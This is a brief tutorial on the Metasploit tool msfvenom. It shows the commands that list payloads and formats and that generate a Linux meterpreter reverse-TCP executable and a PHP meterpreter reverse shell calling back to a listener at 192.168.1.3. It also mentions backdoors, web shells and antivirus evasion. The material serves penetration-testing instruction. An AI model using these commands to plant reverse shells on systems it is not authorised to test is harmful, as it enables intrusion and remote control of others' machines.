Msfvenom is a utility that ships with Metasploit. It is a payload generator that can be used for the following purposes:
- Payload Encoder
- Assistant in Exploit Generation
- Trojan Backdoors
- Generation of web shells
It also has an option to help with antivirus evasion (although quite limited).
Let's see how to use it. The --list option shows the available values for each of the following elements:
- payloads
- formats
- encoders
- archs (architectures)
- platforms
msfvenom --list payloads | grep meterpreter # shows all the meterpreter payloads
Once we select a payload, we can check what options are available for that payload with:
msfvenom --payload linux/x64/meterpreter/reverse_tcp --list-options
Notice that in older versions of metasploit instead of
--list-options we had
We can check which formats and platforms are available for generating our payload:
msfvenom --list formats
msfvenom --list platforms
Once we have picked the format and platform we need, we can generate the payload:
msfvenom --payload linux/x64/meterpreter/reverse_tcp lhost=192.168.1.3 lport=4444 --format elf -o out_filename
Now let's see how to generate a PHP reverse shell:
msfvenom --list payloads | grep php
msfvenom --payload php/meterpreter/reverse_tcp lhost=192.168.1.3 lport=5555 -o php_rev_shell
In order to execute this script we should find a way to upload it and get back a connection which can be handled by our multi-handler.
Note that with msfvenom it is sometimes useful to pass --smallest to generate a very small payload.